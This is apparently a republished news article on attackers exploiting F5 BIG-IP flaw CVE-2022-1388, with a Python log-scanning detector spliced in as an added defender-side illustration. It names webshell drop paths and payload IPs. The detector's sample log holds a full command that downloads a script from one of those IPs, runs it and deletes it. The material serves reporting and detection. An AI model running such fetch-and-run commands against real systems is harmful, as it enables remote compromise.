May 10, 2022 - 12:35 p.m.

Hackers Actively Exploit F5 BIG-IP Bug

threatpost.com

CVSS3: 9.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE | Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH

CVSS2: 7.5 High (AV:N/AC:L/Au:N/C:P/I:P/A:P)
  Access Vector: NETWORK | Access Complexity: LOW | Authentication: NONE | Confidentiality Impact: PARTIAL | Integrity Impact: PARTIAL | Availability Impact: PARTIAL

Threat actors have started exploiting a critical bug in F5’s BIG-IP modules after a working exploit for the vulnerability was made publicly available.

The critical vulnerability, tracked as CVE-2022-1388, allows unauthenticated attackers to launch “arbitrary system commands, create or delete files, or disable services” on affected BIG-IP systems.

The patches and mitigations released by F5 address the vulnerable BIG-IP iControl REST authentication component. If left unpatched, an attacker can exploit the flaw to execute commands with root privileges.

“This issue allows attackers with access to the management interface to basically pretend to be an administrator due to a flaw in how the authentication is implemented,” said Aaron Portnoy, director of research and development, Randori.

“Once you are an admin, you can interact with all the endpoints the application provides, including execute code,” Portnoy added.

A Shodan query shared by security researcher Jacob Baines revealed thousands of BIG-IP systems exposed to the internet, which an attacker could target remotely.

Actively Exploited

In the past 24 hours, security researchers announced that they had created a working exploit for the vulnerability, and images of proof-of-exploit code for CVE-2022-1388 started flooding Twitter.

The exploits are publicly available, and security researchers have shown that an attacker needs to send only two commands and a few headers to reach an F5 application endpoint named “bash” that is exposed to the internet.

The function of this endpoint is to provide an interface for running user-supplied input as a bash command with root privileges.

Germán Fernández, a security researcher at Cronup, revealed that attackers are dropping PHP webshells to “/tmp/f5.sh” and installing them under “/usr/local/www/xui/common/css/”. The observed attacks use the addresses 216[.]162.206[.]213 and 209[.]127.252[.]207 to deliver the payload, which is executed and then removed from the system after installation.
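As an added, defender-side illustration (not code from the article, from F5 or from any of the researchers quoted), the following Python routine scans management-interface audit log lines for the indicators this article reports: POST requests to the utility endpoint named “bash”, references to the reported drop paths, and the two reported payload addresses. The log line format, the sample lines and the endpoint path /mgmt/tm/util/bash are assumptions constructed for the example.

```python
import re
from typing import List, Tuple

# Indicators quoted in the article above; the defanged IPs are re-fanged for matching.
PAYLOAD_HOSTS = {"216.162.206.213", "209.127.252.207"}
DROP_PATHS = ("/tmp/f5.sh", "/usr/local/www/xui/common/css/")

# Constructed audit-log shape used only for this example (not F5's real log format):
#   <src-ip> <iso-timestamp> <method> <path> <status> "<body excerpt>"
LOG_RE = re.compile(
    r'^(?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<ts>\S+) (?P<method>[A-Z]+) '
    r'(?P<path>\S+) (?P<status>\d{3}) "(?P<body>.*)"$'
)

def classify(line: str) -> List[Tuple[str, str]]:
    """Return (severity, reason) findings for one log line; [] when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return [("low", "unparsed line")]
    f = m.groupdict()
    findings: List[Tuple[str, str]] = []
    # The article's exploitation path: a request to the utility endpoint named
    # "bash", which runs the supplied input as a root shell command.
    if f["method"] == "POST" and f["path"].rstrip("/").endswith("/bash"):
        findings.append(("high", "POST to bash utility endpoint"))
    # Post-exploitation artefacts named in the article.
    for p in DROP_PATHS:
        if p in f["body"]:
            findings.append(("high", f"references drop path {p}"))
    # Reported payload-delivery hosts appearing in the command body (not the source IP).
    for h in sorted(PAYLOAD_HOSTS):
        if h in f["body"]:
            findings.append(("medium", f"contacts reported payload host {h}"))
    return findings

def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan log lines; returns (line number, severity, reason) triples."""
    return [(n, sev, why) for n, line in enumerate(lines, 1) for sev, why in classify(line)]

# Constructed sample lines; the endpoint path /mgmt/tm/util/bash is assumed.
SAMPLE = [
    '10.0.0.5 2022-05-10T11:02:00Z GET /mgmt/tm/sys/version 200 ""',
    '198.51.100.7 2022-05-10T11:03:41Z POST /mgmt/tm/util/bash 200 "cmd=id"',
    '198.51.100.7 2022-05-10T11:03:59Z POST /mgmt/tm/util/bash 200 '
    '"cmd=curl -o /tmp/f5.sh http://216.162.206.213/f5.sh; sh /tmp/f5.sh; rm /tmp/f5.sh"',
]

if __name__ == "__main__":
    for n, sev, why in scan(SAMPLE):
        print(f"line {n}: {sev:<6} {why}")
```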

The exploit also works when no password is supplied, as disclosed by Will Dormann, vulnerability analyst at the CERT/CC.

Some of the exploitation attempts did not target the management interface, as observed by Kevin Beaumont, who added that “If you configured F5 box as a load balancer and firewall via self IP it is also vulnerable so this may get messy.”

The ease of exploitation, together with the fact that the vulnerable endpoint carries the name ‘bash’, the popular Linux shell, has raised suspicion among security researchers, some of whom doubt that it ended up in the product by mistake.

“The CVE-2022-1388 vulnerability is surely an honest mistake by an F5 developer, right?” added researcher Will Dormann.

“I’m not entirely unconvinced that this code wasn’t planted by a developer performing corporate espionage for an incident response firm as some sort of revenue guarantee scheme,” said Jake Williams, a vulnerability analyst at the CERT/CC, in a tweet.

Apply Patches Immediately

Administrators are advised to follow F5’s guidelines closely, install the available patches immediately, and remove access to the management interface from the public internet.

F5 has released a detailed advisory with all patches and mitigations, and researchers at the attack surface management firm Randori have released a Bash script that helps determine whether an instance is exploitable via CVE-2022-1388.

Reported By: Sagar Tiwari, an independent security researcher and technical writer.
